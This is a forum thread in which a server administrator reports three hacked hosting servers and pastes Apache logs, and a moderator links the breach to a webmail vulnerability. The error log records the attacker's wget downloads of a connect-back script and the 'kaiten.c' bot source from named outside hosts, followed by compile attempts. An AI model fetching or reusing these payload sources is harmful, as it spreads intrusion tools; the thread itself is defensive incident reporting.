3 DA Servers Compromised Today (kaiten.c)

Status
Not open for further replies.
A

Alwaysonline

Verified User
Joined
Mar 24, 2005
Messages
15
Location
Annapolis MD
Hey Guys,

I am wondering if anyone has had the same issues and if we can find a commonality / vulnerability somewhere.

I have a bunch of dedicated DA servers under management, 3 of them were hit today / compromised. DOS Scripts / programs were uploaded.

Each of the servers run different software

Server 1 (dedicated miva merchant server) w/DA (apf, clam) (clam actually alerted me to the compromise early this morning (it found the trojan in the /var/tmp directory)

Server 2 (dedicted x-cart server)

Server 3 (dedicated joomla server)

Each of these boxes is very clean - they are all not the latest kernel and stuff but something has to be common to all of them.

I searched through the apache log on Server 1, and found what looks like webmail being attacked (I will post those logs below as well - the remote IP attacking is a verizon IP, I know my client wasnt checking his mail from midnight to 7am this morning.)

Each of the servers are pretty up to date, I found evidence of the trojans being downloaded in the /var/log/httpd/error_log file (evidence is posted below)

APACHE ERROR LOG: /var/log/httpd/error_log
-----------------------------------------------------------------
[Tue Dec 30 00:10:02 2008] [notice] SIGHUP received. Attempting to restart
[Tue Dec 30 00:10:02 2008] [notice] Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.7a PHP/4.4.8 mod_perl/1.29 FrontPage/5.0.2.2510 configured -- resuming normal operations
[Tue Dec 30 00:10:02 2008] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[Tue Dec 30 00:10:02 2008] [notice] Accept mutex: sysvsem (Default: sysvsem)
[Tue Dec 30 00:11:01 2008] [notice] caught SIGTERM, shutting down
[Tue Dec 30 00:11:02 2008] [notice] Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.7a PHP/4.4.8 mod_perl/1.29 FrontPage/5.0.2.2510 configured -- resuming normal operations
[Tue Dec 30 00:11:02 2008] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[Tue Dec 30 00:11:02 2008] [notice] Accept mutex: sysvsem (Default: sysvsem)
--07:28:29-- http://64.62.225.99/~jhtech/cback.txt
=> `/var/tmp/cb.txt'
Connecting to 64.62.225.99:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 565 [text/plain]

0K 100% 44.90 MB/s

07:28:29 (44.90 MB/s) - `/var/tmp/cb.txt' saved [565/565]

--09:09:00-- http://c3server.net/.access/kaiten.c
=> `kaiten.c'
Resolving c3server.net... 64.27.50.15
Connecting to c3server.net|64.27.50.15|:80... connected.
HTTP request sent, awaiting response... --09:09:00-- http://c3server.net/.access/kaiten.c
=> `kaiten.c'
Resolving c3server.net... 64.27.50.15
Connecting to c3server.net|64.27.50.15|:80... 200 OK
Length: 39,952 (39K) [text/x-c]

0K ..connected.
HTTP request sent, awaiting response... ....200 OK
Length: 39,952 (39K) [text/x-c]
kaiten.c has sprung into existence.
Retrying.

.... .......... .......... ......... 100% 154.59 KB/s

09:09:00 (154.59 KB/s) - `kaiten.c' saved [39952/39952]

kaiten.c:170: warning: conflicting types for built-in function 'pow'
kaiten.c: In function `killd':
kaiten.c:669: warning: the address of `disable', will always evaluate as `true'
--09:09:01-- http://c3server.net/.access/kaiten.c
(try: 2) => `kaiten.c.1'
Connecting to c3server.net|64.27.50.15|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 39,952 (39K) [text/x-c]

0K .......... .......... .......... ......... 100% 233.09 KB/s

09:09:02 (233.09 KB/s) - `kaiten.c.1' saved [39952/39952]

gcc: kaiten.c: No such file or directory
gcc: no input files
--09:18:06-- http://c3server.net/.access/kaiten.c
=> `kaiten.c'
Resolving c3server.net... --09:18:06-- http://c3server.net/.access/kaiten.c
=> `kaiten.c'
Resolving c3server.net... 64.27.50.15
Connecting to c3server.net|64.27.50.15|:80... 64.27.50.15
Connecting to c3server.net|64.27.50.15|:80... connected.
HTTP request sent, awaiting response... connected.
HTTP request sent, awaiting response... 200 OK
Length: 39,952 (39K) [text/x-c]

0K ..200 OK
Length: 39,952 (39K) [text/x-c]
kaiten.c has sprung into existence.
Retrying.

........ .......... .......... ......... 100% 169.41 KB/s

09:18:06 (169.41 KB/s) - `kaiten.c' saved [39952/39952]

kaiten.c:170: warning: conflicting types for built-in function 'pow'
kaiten.c: In function `killd':
kaiten.c:669: warning: the address of `disable', will always evaluate as `true'
--09:18:07-- http://c3server.net/.access/kaiten.c
(try: 2) => `kaiten.c.2'
Connecting to c3server.net|64.27.50.15|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 39,952 (39K) [text/x-c]

0K .......... .......... .......... ......... 100% 136.80 KB/s

09:18:08 (136.80 KB/s) - `kaiten.c.2' saved [39952/39952]

gcc: kaiten.c: No such file or directory
gcc: no input files
--------------------------------------------------------------------



APACHE LOG (Log for the site - looks like it is being attacked from midnight through this morning - I will only post part of the log, but it looks like this througout the early morning -midnight to 8am

-----------------------------------------------------------------
71.246.82.38 - - [30/Dec/2008:04:01:12 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:01:12 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:02:03 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:02:03 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:02:53 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:02:53 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:03:44 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:03:44 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:04:34 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:04:34 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:05:25 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:05:25 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:06:15 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:06:15 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:07:06 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:07:06 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:07:56 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:07:56 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:08:47 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:08:47 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:09:37 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:09:37 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:10:28 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:10:28 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:11:18 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:11:18 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:12:09 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:12:09 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:12:59 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:12:59 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:13:50 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:13:50 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:14:40 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:14:41 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:15:31 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:15:31 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:16:21 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:16:22 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:17:12 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:17:12 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:18:02 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:18:03 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:18:53 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:18:53 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:19:43 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:19:44 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:20:34 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:20:34 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:21:24 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:21:25 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:22:15 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:22:15 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:23:05 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:23:06 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:23:56 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:23:56 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:24:46 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:24:47 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:25:37 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:25:37 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:26:27 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:26:28 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:27:18 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:27:18 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:28:08 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:28:09 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:28:59 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:28:59 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:29:49 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:29:50 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:30:40 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:30:40 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:31:31 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:31:31 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:32:21 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:32:21 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:33:12 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:33:12 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:34:02 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:34:02 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:34:53 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:34:53 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:35:43 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:35:43 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:36:34 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:36:34 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
--------------------------------------------------------------------------

Any help much appreciated.
 
For some reason your post was moderated by automatic software built ito the forum. I just noticed it and approved it.

Generally I'd look first at Joomla if the problem appeared first on the server hosting Joomla, or if all the servers have Joomla installed.

In your case, since the error log where the problem is showing up is the main error log, I'd check all pages running from /var/www/html.

I believe I read in the past few days of one of the webmail systems (one I don't use) having a problem.

edit: Roundcube. Thread closed because it's been moved to the Roundcube vulnerability thread, here.

Good luck. Please keep us updated in that thread.

Jeff
 
Status
Not open for further replies.
Back
Top